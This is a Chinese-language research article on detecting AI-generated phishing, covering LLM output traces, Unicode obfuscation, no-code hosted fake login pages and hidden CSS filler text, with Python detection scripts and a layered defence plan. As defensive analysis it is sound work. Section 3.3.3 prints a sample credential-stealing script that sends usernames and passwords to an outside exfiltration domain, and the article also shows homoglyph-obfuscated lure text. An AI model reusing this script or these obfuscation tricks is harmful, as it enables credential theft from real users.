AI 辅助钓鱼攻击的 LLM 生成痕迹识别与全域防御体系研究

原创

芦笛

发布于 2026-06-19 18:34:22

文章被收录于专栏：公共互联网反网络钓鱼（APCN）公共互联网反网络钓鱼（APCN）

摘要

生成式大语言模型（LLM）已成为网络钓鱼攻击规模化、高保真化的核心工具。KnowBe4 威胁实验室 2026 年监测数据显示，近半年 86% 的钓鱼攻击借助 AI 生成内容，AI 钓鱼邮件点击率达 54%，传统人工编写钓鱼邮件仅 12%，全球每日钓鱼邮件投递规模达 20 至 40 亿封。AI 消除了传统钓鱼存在的拼写错误、语句生硬、仿品牌页面粗糙等识别特征，基于语法瑕疵、域名黑名单的传统防护机制全面失效。本文基于真实野外 AI 钓鱼攻击样本，系统归纳四类可稳定识别的 LLM 生成指纹：LLM 指令残留前置文本、Unicode 同形字符与隐形噪声混淆机制、无代码平台搭建的高仿真凭证窃取页面、带冗余注释与过度工程化特征的恶意前端代码、CSS 隐藏式 AI 生成虚假对话填充块。针对每一类攻击痕迹给出原始代码样本、特征量化判定标准，梳理现有邮件安全网关（SEG）、URL 信誉过滤、终端行为检测的结构性缺陷。反网络钓鱼技术专家芦笛指出，当前企业安全防护体系普遍存在 “依赖传统文本瑕疵判断、信任域名信誉、缺乏 LLM 特征专项检测” 三重短板，无法适配 AI 赋能的新型钓鱼链路。本文从设备侧、邮件网关侧、员工安全意识培训、威胁情报运营四个维度构建全域防御框架，提出基于多维度 LLM 指纹特征的静态检测算法，给出可落地的检测代码实现逻辑，为政企机构应对 AI 驱动钓鱼攻击提供完整技术研判与防护方案。研究结论客观验证：仅依靠信誉过滤与语法校验无法拦截 AI 钓鱼，必须建立针对 LLM 生成专属特征的多层级检测机制，同步迭代人员安全认知训练体系，形成技术 + 管理双闭环防御。

关键词：网络钓鱼；大语言模型；LLM 指纹；Unicode 混淆；无代码钓鱼页面；邮件安全防护

1 引言

1.1 研究背景与问题提出

网络钓鱼长期作为攻击者获取初始访问权限的首要向量，MITRE ATT&CK 框架将鱼叉式钓鱼链接、钓鱼附件列为高频杀伤链路。在 LLM 技术普及前，钓鱼攻击存在天然识别短板：攻击者受限于文字撰写能力，邮件存在大量拼写错误、语序混乱；仿官方登录页面配色、字体、布局存在明显违和感；混淆手段单一，仅依靠短链接、简易域名替换规避检测。企业安全培训体系长期以 “查找错别字、辨别粗糙仿冒页面” 为核心教学内容，安全网关基于文本语法特征、恶意域名黑名单、图片像素差异完成拦截，形成一套成熟且标准化的防护范式。

2025 年末至 2026 年上半年，攻击链路发生根本性变革。攻击者通过免费商用 LLM、本地开源大模型批量生成钓鱼邮件、仿企业协作平台通知、勒索邮件、账单欺诈内容，无需专业文字功底即可产出零语法错误、高度贴合企业业务场景的定制化钓鱼文本；借助 Base44、Beacons.ai、Retool 等零代码可视化平台，仅通过自然语言指令即可一键生成像素级复刻微软 365、谷歌云、SharePoint 的凭证窃取页面，托管于正规 SaaS 平台域名之下，天然继承平台可信域名信誉，绕过传统 URL 信誉扫描引擎。

KnowBe4 野外样本监测数据揭示核心矛盾：AI 重构了钓鱼攻击的表层特征，却无法完全抹去大模型生成内容独有的底层痕迹，而现有安全设备、人员培训体系均未针对该类 LLM 专属指纹设计识别逻辑。传统防护机制失效直接推高攻击成功率，企业遭受账号劫持、数据泄露、勒索加密的风险呈指数级上升。反网络钓鱼技术专家芦笛强调，当前行业普遍存在认知误区：将 “无错别字、界面精美” 等同于合法可信内容，该认知偏差是 AI 钓鱼攻击大规模得手的核心诱因，安全防御体系必须完成底层逻辑重构，从 “识别文本瑕疵” 转向 “识别 AI 生成特征”。

现有相关研究多聚焦通用场景下 LLM 文本检测，针对钓鱼攻击场景下 LLM 混淆技术、代码指纹、隐藏填充文本的专项实证研究较少，缺乏结合真实攻击样本的代码特征拆解、可落地检测脚本与完整企业防护方案。本文依托 KnowBe4 公开的 2026 年野外 AI 钓鱼全链路样本，完整拆解攻击全流程的 LLM 遗留痕迹，量化各类特征识别阈值，编写检测代码示例，构建分层防御体系，填补工业场景下 AI 钓鱼专项防护研究空白。

1.2 研究内容与论文结构

本文共分为六个核心章节：第一章为引言，阐述研究背景、研究价值与整体行文框架；第二章梳理 AI 赋能钓鱼攻击的整体链路与行业监测数据，明确攻击规模化、高保真化的核心特征；第三章分类拆解四类核心 LLM 生成指纹，附带原始攻击代码样本、混淆机制原理与特征判定标准；第四章分析传统邮件安全网关、信誉过滤、人员培训体系的结构性缺陷，论证旧防护体系失效的底层逻辑；第五章构建面向 AI 钓鱼的多层级全域防御体系，包含文本 LLM 指纹检测代码、网页恶意代码静态检测规则、企业管理与培训升级方案；第六章总结全文研究结论，提出后续研究拓展方向。

1.3 研究价值

理论层面：完整梳理 AI 钓鱼全链路 LLM 生成痕迹分类体系，建立针对钓鱼场景的 LLM 特征判定标准，补充生成式安全对抗领域细分场景研究素材；

工程实践层面：提供可直接集成至邮件网关、网页检测平台的特征检测代码，给出政企可落地的技术防护、人员培训、威胁情报运营标准化流程，具备直接落地部署价值；

行业认知层面：纠正企业安全团队 “依靠拼写错误识别钓鱼” 的固有思维，明确零代码平台托管钓鱼页面的信誉过滤漏洞，为安全厂商迭代新一代邮件安全检测引擎提供实证依据。

2 AI 辅助钓鱼攻击整体链路与行业监测数据

2.1 AI 钓鱼攻击完整链路

完整 AI 驱动钓鱼攻击分为四层流水线，全程无需攻击者具备专业编程、文案、网页开发能力：

文本生成层：攻击者输入提示词指令 LLM 生成定制钓鱼邮件，包含微软 365 密码过期、账单逾期、共享文档通知、沃尔玛积分兑换、色情勒索等诱饵话术；部分攻击者追加指令要求模型添加隐藏填充文本、使用 Unicode 同形字符混淆文本。LLM 原生输出会附带指令格式化前置语句，多数攻击者未清理该残留文本，形成标志性指纹。

混淆加固层：通过 LLM 指令自动插入隐形 Unicode 噪声字符、替换标准字符为视觉同形 Unicode 字符、生成 CSS 隐藏区块存放虚假对话文本，规避哈希匹配、文本特征扫描、关键词拦截。

钓鱼页面构建层：攻击者使用自然语言指令零代码平台生成仿官方登录页面，平台提供免费托管域名，页面前端 JS、CSS 代码全部由 LLM 自动生成，附带大量冗余中文注释、过量 CSS 打印属性、高频 emoji 装饰，形成代码层专属指纹。

投递与数据窃取层：通过批量邮件投递工具分发 AI 生成钓鱼邮件，邮件内嵌入零代码平台可信域名链接；受害者点击链接输入账号密码后，JS 脚本将凭证通过 Telegram 接口、攻击者自建域名回传窃取数据。

2.2 行业量化监测数据支撑

KnowBe4 2026 年上半年钓鱼趋势报告、Cisco Talos 一季度安全报告提供量化数据支撑，形成数据闭环论据：

攻击占比：近半年野外捕获钓鱼样本中，86% 使用 AI 辅助生成文本与页面代码，AI 钓鱼已成为攻击基线，非小众攻击手段；

转化效率：AI 钓鱼邮件点击率 54%，传统人工撰写钓鱼邮件仅 12%，高保真无瑕疵文本大幅降低用户警惕性；

攻击体量：全球每日投递钓鱼邮件 20 亿至 40 亿封，钓鱼超越漏洞利用，成为企业内网初始入侵第一向量；

基础设施特征：主流恶意页面托管平台包含 Base44.app、Beacons.ai、Retool，此类平台域名初始信誉评级全部为可信，常规 URL 扫描无恶意标记。

反网络钓鱼技术专家芦笛针对该组数据解读：54% 的高点击率证明传统安全意识培训逻辑完全失效，当钓鱼邮件不存在语法错误、仿页面与官方无视觉差异时，普通员工无法依靠过往培训经验识别风险，必须依靠技术设备前置拦截，同时重构员工培训核心考核指标。

2.3 MITRE ATT&CK 攻击链路映射

结合样本攻击手段，将 AI 钓鱼全链路对应 MITRE ATT&CK 标准战术技术编号，明确攻击标准化分类：

T1566.001（鱼叉钓鱼附件）：LLM 批量生成诱饵邮件附件文案，规模化分发；

T1566.002（鱼叉钓鱼链接）：零代码平台构建高保真仿登录页面，依托可信域名投放钓鱼链接；

T1027（文件信息混淆）：Unicode 同形字符、隐形噪声 Token、CSS 隐藏文本块多重混淆叠加；

T1583.001（基础设施采购）：攻击者注册跳转域名、数据回传域名，搭建完整窃取链路；

T1598（信息钓鱼）：仿官方页面采集账号、密码、企业邮箱等敏感凭证。

标准化 ATT&CK 映射证明，AI 并未创造全新攻击战术，而是对现有钓鱼手段进行效率、保真度双重升级，原有针对混淆、钓鱼链接的检测规则未适配 LLM 新增特征，导致拦截失效。

3 AI 钓鱼攻击四类核心 LLM 生成指纹与样本代码解析

本章基于野外真实攻击原始样本，分层拆解四类可稳定识别的 LLM 专属痕迹，每类痕迹配套原始代码样本、混淆原理、人工判定标准，为后续检测算法提供特征库基础。

3.1 特征一：LLM 指令残留前置文本与模型输出标识

3.1.1 痕迹形成原理

攻击者向 LLM 输入提示词时，通常要求模型将输出内容分章节、分段格式化输出，LLM 会在正文最前端自动生成一句结构化说明文本，作为模型输出的前置注释。多数攻击者仅复制正文内容，遗漏删除该句标识文本，直接投递至受害者邮箱，形成无法伪造的 AI 生成签名。

3.1.2 真实攻击样本原文

野外勒索钓鱼邮件首行原始内容：

Here is the message formatted and divided into sections:

该语句出现在邮件正文第二行，无任何业务逻辑含义，仅为 LLM 响应提示词的标准化输出前缀。

3.1.3 配套叠加混淆手段

携带该前置标识的邮件样本中，同步叠加两类 LLM 自动生成混淆机制：

隐形反指纹噪声 Token：邮件正文插入零宽空格、不可见 Unicode 控制字符，破坏邮件安全网关基于文本哈希的匹配检测；

Unicode 同形字符替换：将标准英文字母替换为视觉完全一致的 Unicode 异体字符，规避关键词正则匹配拦截。

3.1.4 判定标准

反网络钓鱼技术专家芦笛提出该特征量化判定规则：邮件正文前三行出现无业务意义、描述文本分段格式化的标准化句式，同时检测到不可见 Unicode 字符、同形替换字符，即可判定为 LLM 生成高风险钓鱼邮件。

3.1.5 简易检测正则代码示例（Python）

import re

# LLM前置特征关键词库

llm_prefix_pattern = re.compile(r"Here is the message formatted and divided into sections", re.IGNORECASE)

# 不可见Unicode噪声字符正则

invisible_unicode = re.compile(r"[\u2000-\u200F\u2028\u2029]")

def check_llm_prefix(text_content: str) -> dict:

prefix_hit = bool(llm_prefix_pattern.search(text_content[:300]))

invisible_char_count = len(invisible_unicode.findall(text_content))

risk_level = "高风险" if prefix_hit and invisible_char_count > 5 else "低风险"

return {

"prefix_match": prefix_hit,

"invisible_char_num": invisible_char_count,

"risk": risk_level

}

# 调用示例

email_raw = "Here is the message formatted and divided into sections:\n您好，您的微软365账户密码即将过期，请点击链接验证身份..."

result = check_llm_prefix(email_raw)

print(result)

代码逻辑说明：截取邮件前 300 字符检测 LLM 标志性前置语句，统计全文不可见 Unicode 控制字符数量，两者同时命中则标记为高风险 AI 钓鱼邮件，可直接接入邮件安全网关预处理流程。

3.2 特征二：Unicode 同形字符 + 隐形噪声双重混淆机制

3.2.1 技术原理

LLM 可根据提示词自动完成文本混淆，分为两类混淆单元协同作用：

Unicode 零宽噪声 Token：\u200B、\u200C 等不可见字符穿插在正常文字间隙，文本展示无变化，但邮件网关哈希计算、关键词匹配会因字符扰动失效；

Unicode 同形异体字符：使用西里尔字母、希腊字母中视觉与英文字母完全一致的字符替换原文，肉眼无法区分，传统文本正则引擎仅匹配标准 ASCII 字符，直接绕过拦截规则。

示例：标准字符login经 LLM 混淆后变为视觉一致、编码完全不同的同形字符组合，安全设备关键词拦截失效。

3.2.2 原始混淆文本片段

原始钓鱼文本混淆片段：

v\u200Be\u043Arify your acc\u200Bount to av\u043AoID service suspension

肉眼识别为 “verify your account to avoID service suspension”，后台文本解析存在大量不可见字符与西里尔同形字符。

3.2.3 检测实现代码

def detect_unicode_obfuscation(text: str) -> dict:

# 零宽不可见字符集合

zero_width_chars = {"\u200B", "\u200C", "\u200D", "\u200E", "\u200F"}

# 西里尔同形英文字符映射库

cyrillic_homoglyph = {"а":"a", "е":"e", "о":"o", "с":"c", "р":"p"}

zw_count = sum(1 for c in text if c in zero_width_chars)

homo_count = sum(1 for c in text if c in cyrillic_homoglyph.keys())

total_obfuscate = zw_count + homo_count

risk = "高混淆风险" if total_obfuscate >= 3 else "正常文本"

return {

"zero_width_num": zw_count,

"homoglyph_num": homo_count,

"total_obfuscate_char": total_obfuscate,

"risk_tag": risk

}

该代码可部署于邮件安全网关文本解析模块，实时统计混淆字符数量，设置阈值拦截高混淆度 AI 钓鱼邮件。

3.3 特征三：零代码平台托管高仿真钓鱼页面与 LLM 生成恶意代码指纹

3.3.1 攻击基础设施漏洞机理

Base44、Beacons.ai、Retool 等零代码开发平台面向普通用户开放免费网页托管服务，域名经过平台备案、信誉评级初始为可信。攻击者仅通过自然语言提示 LLM 生成页面需求，无需前端开发基础，即可生成像素级复刻微软、谷歌、SharePoint 的登录界面，页面托管于平台二级域名，URL 信誉扫描、沙箱检测均判定为正常站点，传统基于域名黑名单、页面视觉比对的防护完全失效。

野外样本托管域名示例：

enthusiastic-secure-link-go.base44.app（仿微软 365 密码过期页面）

3.3.2 LLM 生成恶意 JS/CSS 代码三大标志性指纹

多语言冗余业务注释：JS 脚本中包含大量中文、英文注释，完整记录攻击逻辑（反机器人检测、凭证回传接口、误报控制参数），注释内容直接复刻攻击者输入 LLM 的提示词；

高频 emoji 装饰元素：页面界面、代码注释中大量插入表情符号，人类开发者编写后台检测脚本极少使用 emoji，LLM 生成界面默认高频添加；

过度工程化冗余 CSS 属性：单个 HTML 锚标签附带十余项打印排版专用 CSS 参数（orphans:2、widows:2、font-variant-ligatures:normal 等），网页前端无实际展示作用，仅为 LLM 依据训练数据完整填充属性，无人类工程取舍逻辑。

3.3.3 原始恶意 JS 代码样本片段（含中文注释指纹）

// 反机器人检测脚本，零误报等级 Zero False Positive Level

// MERGED LOGIC：整合浏览器环境探测与表单数据抓取逻辑

// 窃取凭证回传接口：https://t.me/xxxxxx

function antiBotDetect(){

let ua = navigator.userAgent;

if(ua.indexOf("bot") != -1 || ua.indexOf("scanner") != -1){

window.location.href = "https://www.microsoft.com";

}else{

document.getElementById("login-form").onsubmit = function(e){

e.preventDefault();

let user = document.getElementById("username").value;

let pwd = document.getElementById("password").value;

fetch("https://akusu.co.in/exfil",{

method:"POST",

body:JSON.stringify({user,pwd})

})

}

antiBotDetect();

代码特征分析：注释完整复刻攻击者提示词需求，包含明文数据回传域名 akusu.co.in（IOC 指标），是典型 LLM 生成恶意代码标识。

3.3.4 冗余 CSS 特征样本

<a href="https://fake-login.site" style="orphans:2;widows:2;font-variant-ligatures:normal;text-indent:0.2rem;letter-spacing:0.05em;page-break-after:auto;">立即验证账号</a>

orphans、widows 为打印分页控制属性，网页端无业务价值，人类前端工程师不会写入链接行内样式，仅 LLM 生成代码会完整填充全部属性。

3.3.5 网页代码静态检测代码示例

import re

# 匹配LLM生成中文注释关键词

llm_comment_keyword = re.compile(r"零误报|反机器人检测|MERGED LOGIC", re.MULTILINE)

# 匹配冗余打印CSS属性

print_css_prop = re.compile(r"orphans|widows|font-variant-ligatures")

# 匹配emoji符号

emoji_pattern = re.compile(r"[\U0001F600-\U0001F64F]")

def scan_phish_page_code(html_js_code: str) -> dict:

comment_hit = len(llm_comment_keyword.findall(html_js_code))

css_hit = len(print_css_prop.findall(html_js_code))

emoji_count = len(emoji_pattern.findall(html_js_code))

total_feature = comment_hit + css_hit + emoji_count

risk = "LLM生成恶意页面高风险" if total_feature >= 2 else "正常页面"

return {

"llm_comment_matches": comment_hit,

"redundant_css_count": css_hit,

"emoji_num": emoji_count,

"page_risk": risk

}

该脚本可集成至网页沙箱静态代码检测模块，对零代码平台域名页面强制解析源码，识别 LLM 代码指纹。

3.4 特征四：CSS 隐藏式 AI 生成虚假对话填充文本块

3.4.1 攻击目的

攻击者指令 LLM 生成大段无业务关联的虚假聊天对话，通过 CSS 样式设置 display:none、max-height:0、transparent 文字颜色，内容对终端用户完全隐藏，但会填充邮件全文文本长度，规避安全网关 “短文本高风险” 启发式扫描。常规扫描引擎读取完整文本内容，判定邮件为日常闲聊内容，降低风险评分，绕过拦截。

3.4.2 隐藏文本 CSS 实现代码

Hi, I wanted to share a routine everyday message from recipient email...

</div>

3.4.3 隐藏文本内四大 AI 专属文本特征

精准等间隔时间戳：对话消息时间严格间隔 7 至 8 分钟（5:08、5:14、5:21、5:29），人类日常聊天不存在标准化精准间隔；

邮件格式存储短信对话：内容为外卖订餐即时通讯话术，载体却是邮件文本，不符合人类沟通场景习惯；

重复锚定收件人邮箱：对话全程反复完整书写收件人邮箱地址，人类沟通不会完整域名互相称呼；

无意义数学拆分计算：对话内出现食物均分、金额拆分等冗余数学运算，属于 LLM 过度推演生成特征。

3.4.4 隐藏文本检测代码

def detect_hidden_css_text(html_content: str) -> dict:

# 匹配隐藏内容CSS样式特征

hidden_css_pattern = re.compile(r"display:none|max-height:0|color:transparent")

# 匹配规整7-8分钟时间戳

time_stamp_pattern = re.compile(r"\d{1,2}:\d{2},\s*\d{1,2}:\d{2},\s*\d{1,2}:\d{2}")

css_hidden_hit = bool(hidden_css_pattern.search(html_content))

timestamp_match = bool(time_stamp_pattern.search(html_content))

risk = "隐藏填充文本钓鱼风险" if css_hidden_hit and timestamp_match else "无隐藏混淆块"

return {

"has_hidden_css_block": css_hidden_hit,

"standard_interval_timestamp": timestamp_match,

"email_risk_tag": risk

}

4 传统网络钓鱼防护体系结构性缺陷分析

基于第三章 LLM 指纹特征，结合企业现有安全设备、管理培训现状，从邮件安全网关、URL 信誉过滤、人员安全意识培训三个维度拆解底层失效逻辑，反网络钓鱼技术专家芦笛针对每类缺陷给出客观研判。

4.1 邮件安全网关（SEG）检测机制缺陷

传统 SEG 检测规则建立在 2020 年前人工钓鱼样本基础上，核心依赖三类判定逻辑，均无法适配 AI 钓鱼样本：

语法拼写错误检测：AI 生成文本零拼写、语法错误，该核心特征完全失效；

关键词哈希匹配：攻击者通过 Unicode 隐形字符、同形字符扰动文本哈希，固定哈希库无法命中混淆后文本；

短文本风险启发式：攻击者通过 CSS 隐藏块填充大段虚假对话，拉长文本长度，规避短文本风险标记。

芦笛指出：现有商用 SEG 均未内置 LLM 前置语句、隐藏 CSS 文本、冗余打印 CSS 属性专项检测规则，仅依靠通用文本分析，对 AI 钓鱼邮件拦截率不足 30%，无法形成有效前置防护。

4.2 基于域名信誉的 URL 过滤机制固有漏洞

主流网页安全防护、邮件链接扫描系统核心判定依据为域名历史信誉、平台备案资质，存在结构性短板：

零代码平台域名天然可信：Base44、Retool、Beacons.ai 为正规 SaaS 服务商，域名无恶意历史记录，信誉评分满分，沙箱静态扫描仅识别域名，无法深度解析页面底层 JS/CSS 代码；

跳转域名批量注册成本低廉：攻击者批量注册低成本普通域名（brookstone12.com、sleadtrack.com）作为跳转中继，域名无不良记录，信誉过滤放行；

动态页面内容检测缺失：现有 URL 扫描多为表层页面截图比对，不解析完整前端源码，无法识别 JS 注释、冗余 CSS 等 LLM 代码指纹。

信誉过滤仅能拦截已知恶意域名，对依托正规平台托管的新型 AI 钓鱼页面完全失效，属于事后被动防御，无法应对零日 AI 钓鱼页面。

4.3 传统员工安全意识培训认知偏差

企业多年安全培训核心教学点存在严重滞后性，形成员工固有错误判断逻辑：

核心判断标准错位：培训重点强调 “寻找错别字、模糊 logo、粗糙页面”，员工收到工整无瑕疵 AI 钓鱼邮件时，放松警惕；

核验流程缺失：多数培训未强制要求 “独立地址栏校验域名、跨渠道线下确认通知真实性”，员工仅依靠页面视觉判断真伪；

对新型混淆手段认知空白：员工无法识别 Unicode 隐形字符、页面隐藏文本、正规平台仿冒页面等新型攻击手段，无对应识别训练。

芦笛强调：人员是最后一道防线，但当前培训体系完全针对传统钓鱼设计，必须全面重构培训考核重点，将 URL 域名核验、跨渠道确认作为核心考核指标，放弃以拼写错误为识别依据的老旧教学内容。

5 面向 AI 辅助钓鱼攻击的全域多层级防御体系

针对第四章梳理的三重防护短板，构建 “设备前置技术拦截 + 网页静态代码检测 + 人员安全认知升级 + 威胁情报持续运营” 四层闭环防御框架，全部方案基于前文 LLM 指纹特征落地，技术代码可直接部署，管理流程标准化可执行。

5.1 第一层：邮件安全网关 LLM 指纹多特征联动检测模块

在现有 SEG 预处理流程前新增独立 LLM 特征检测流水线，串行执行四类特征检测脚本，采用加权风险评分机制，总分超过阈值直接隔离邮件：

检测流程顺序：

（1）邮件纯文本解析：执行 LLM 前置语句检测、Unicode 混淆字符统计；

（2）邮件 HTML 源码解析：检测 CSS 隐藏填充文本块、标准化间隔时间戳；

（3）邮件内链接提取：跳转至网页沙箱执行前端代码 LLM 指纹扫描；

风险加权评分规则（阈值总分 60 分拦截）：

命中 LLM 格式化前置语句：+30 分；

不可见 Unicode 字符≥5 个 / 同形字符≥3 个：+20 分；

存在 CSS 隐藏文本块 + 规整时间戳：+15 分；

链接页面命中 LLM 代码注释 / 冗余 CSS / 高频 emoji：+25 分。

落地部署说明：将第三章四段 Python 检测脚本封装为 API 接口，SEG 每接收一封外部邮件自动调用接口计算风险分值，达到阈值移入隔离沙箱，人工复核后批量归档威胁样本。

5.2 第二层：网页沙箱静态代码深度解析机制

针对零代码平台可信域名建立强制深度解析规则，放弃仅域名信誉判定逻辑，新增三条强制检测策略：

白名单域名强制源码扫描：将 Base44.app、Beacons.ai、Retool 等零代码平台纳入强制深度扫描白名单，无论域名信誉高低，全部解析完整 HTML、JS、CSS 源码；

LLM 代码指纹多特征联合判定：同时匹配中文攻击注释、冗余打印 CSS、大量 emoji 三类特征，两项及以上同时命中标记为恶意窃取页面；

凭证回传域名 IOC 实时匹配：提取 JS 脚本内明文数据回传接口域名，与威胁情报库 IOC（akusu.co.in、bhuntr.com等）实时比对，命中直接拦截链接访问。

5.3 第三层：企业安全意识培训体系重构方案

反网络钓鱼技术专家芦笛提出标准化培训升级方案，全面淘汰老旧识别逻辑，建立全新员工风险判断标准：

取消 “查找拼写错误” 识别教学，核心培训三大核验手段：

（1）域名地址栏核验：所有登录页面必须核对顶级域名，微软服务仅信任microsoft.com，谷歌仅信任google.com，二级第三方平台域名一律判定可疑；

（2）跨渠道离线确认：收到账户过期、文档共享、账单通知邮件，禁止直接点击链接，通过企业微信、线下办公电话联系管理员确认；

（3）警惕高完美度诱饵：无任何瑕疵、排版精美的陌生业务通知属于高风险诱饵，需优先核验。

常态化模拟钓鱼演练优化：企业定期批量投放 AI 生成无语法错误钓鱼测试邮件，统计员工点击转化率，将转化率纳入部门安全考核；

混淆手段科普培训：定期推送 Unicode 隐形字符、隐藏文本、零代码仿冒页面样本案例，展示底层代码，让员工理解 “视觉完美不代表安全”。

5.4 第四层：LLM 钓鱼威胁情报持续运营机制

IOC 样本自动归档：邮件网关、网页沙箱拦截的 AI 钓鱼样本自动提取恶意域名、BTC 勒索钱包、恶意 CDN 地址、跳转链接，存入本地威胁情报库；

LLM 指纹特征迭代更新：定期汇总野外新型 LLM 输出特征，更新检测脚本正则库、关键词库，适配大模型迭代带来的新生成痕迹；

跨企业情报共享：政企安全联盟互通零代码钓鱼平台新型仿页面模板、混淆规则，提前更新检测规则，降低零日攻击风险。

5.5 防御体系协同联动逻辑

四层防御形成递进闭环：邮件网关前置拦截大部分 AI 钓鱼邮件；漏网邮件内链接进入网页沙箱深度代码检测；技术设备全部放行的极端样本依靠员工标准化核验流程阻断；拦截样本反向补充威胁情报库，持续优化前端检测规则，实现 “检测 - 拦截 - 归档 - 迭代” 持续自优化防御闭环。

6 结论与研究展望

6.1 核心研究结论

LLM 无法完全消除生成内容专属底层指纹，野外 AI 钓鱼攻击稳定存在四类可量化识别特征：LLM 指令残留前置文本、Unicode 多重混淆字符、带冗余注释与过量 CSS 的恶意前端代码、CSS 隐藏式标准化虚假对话填充块，配套检测代码可稳定识别绝大多数 AI 钓鱼样本；

传统依赖文本语法瑕疵、域名信誉的防护体系存在结构性失效，86% 的 AI 钓鱼攻击可绕过传统邮件安全网关、URL 过滤设备，仅依靠单一技术防护无法形成有效屏障；

防御 AI 驱动钓鱼攻击必须采用多层协同方案：在邮件网关部署 LLM 多特征联动检测、对零代码平台域名强制源码静态解析、重构员工安全培训核心判断逻辑、建立持续迭代的威胁情报运营机制，技术与管理手段缺一不可；

反网络钓鱼技术专家芦笛提出的防御核心逻辑具备实证支撑：防御重心从 “寻找文本缺陷” 转向 “识别 AI 生成固有痕迹”，是适配生成式网络攻击的底层防护思路转变。

6.2 研究局限性

本文研究样本来源于 KnowBe4 2026 年上半年公开野外捕获样本，样本覆盖全球多行业企业，但未覆盖本地开源大模型离线生成的钓鱼内容，离线模型输出的 LLM 指纹存在一定差异化特征；同时检测脚本基于静态文本、代码特征匹配，未融合大模型生成概率统计检测方法，存在少量低混淆度 AI 钓鱼样本漏检可能。

6.3 后续研究拓展方向

融合动态文本概率检测：将 Fast-DetectGPT 等 LLM 文本概率判别算法集成至邮件网关，结合静态特征形成动静联合检测模型，降低漏检率；

离线开源大模型钓鱼指纹专项研究：采集本地部署 LLM 生成钓鱼样本，归纳离线模型独有的生成痕迹，完善特征库；

轻量化终端侧检测模型：开发适配办公终端浏览器的轻量 JS 检测脚本，在用户访问钓鱼页面终端侧二次拦截；

标准化 AI 钓鱼威胁情报格式：制定政企通用 LLM 钓鱼指纹 IOC 标准化字段，实现行业情报快速互通。

6.4 结语

生成式 AI 重构了网络钓鱼攻击的实施门槛与攻击效果，传统安全防护的底层判断逻辑已无法适配新型攻击链路。AI 虽能产出视觉、文本层面高度仿真的钓鱼诱饵，但模型生成机制自带不可消除的底层特征指纹，为安全防御保留稳定检测入口。政企机构需同步完成技术设备检测规则迭代与人员安全认知体系升级，摒弃陈旧、滞后的钓鱼识别经验，建立以 LLM 生成痕迹识别、域名独立核验、跨渠道离线确认为核心的全新防护范式。面对持续迭代的生成式网络威胁，安全防御不能停留在被动拦截已知恶意特征，必须建立持续追踪模型生成规律、动态更新检测规则的长效运营机制，实现对 AI 驱动钓鱼攻击的全域、长效防控。

编辑：芦笛（公共互联网反网络钓鱼工作组）

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

网络钓鱼攻击